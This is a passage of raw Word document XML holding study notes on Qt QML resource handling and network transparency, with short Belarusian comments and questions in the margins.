          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="004F038E"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Finally,</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project.pro</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RESOURCES</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable to indicate that</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example.qrc</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be used to build the application resources:</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QT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qml</w:t>
      </w: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0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2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0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SOURCES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main</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cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RESOURCES </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 xml:space="preserve"> example</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId391" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The Qt Resource System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007071A3" w:rsidRPr="008D55B3" w:rsidRDefault="008D55B3" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// рэсурсы павінны ўключаць усё, але ў кмл лепей спасылацца праз адносныя шляхі. </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Якія бенефіты гэта дае?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F74BB" w:rsidRPr="007A24CD" w:rsidRDefault="00490E7E" w:rsidP="00B71BEF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId392" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>documents</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>networktransparency</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007A24CD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="488" w:name="_Toc483000635"/>
      <w:bookmarkStart w:id="489" w:name="_Toc483003652"/>
      <w:bookmarkStart w:id="490" w:name="_Toc483603988"/>
      <w:bookmarkStart w:id="491" w:name="_Toc483605208"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource Loading and Network Transparency</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
      <w:bookmarkEnd w:id="489"/>
      <w:bookmarkEnd w:id="490"/>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML </w:t>
      </w:r>
      <w:r w:rsidRPr="00D856AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">supports network transparency by using </w:t>
      </w:r>
      <w:r w:rsidRPr="008F083E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URLs (rather than file names)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all references from a QML document to other content. This means that anywhere a URL source is expected, QML can handle remote resources as well as local ones, for </w:t>
      </w:r>
      <w:r w:rsidRPr="008F083E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the following image source:</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"http://www.example.com/images/logo.png"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="004F038E" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F083E" w:rsidRPr="008F083E" w:rsidRDefault="008F083E" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F083E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>У мяне з інтэрнэта нешта не грузіцца. Выскаківае пэўная памылка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Since a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL is the same as a relative file, development of QML on regular file systems remains simple:</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
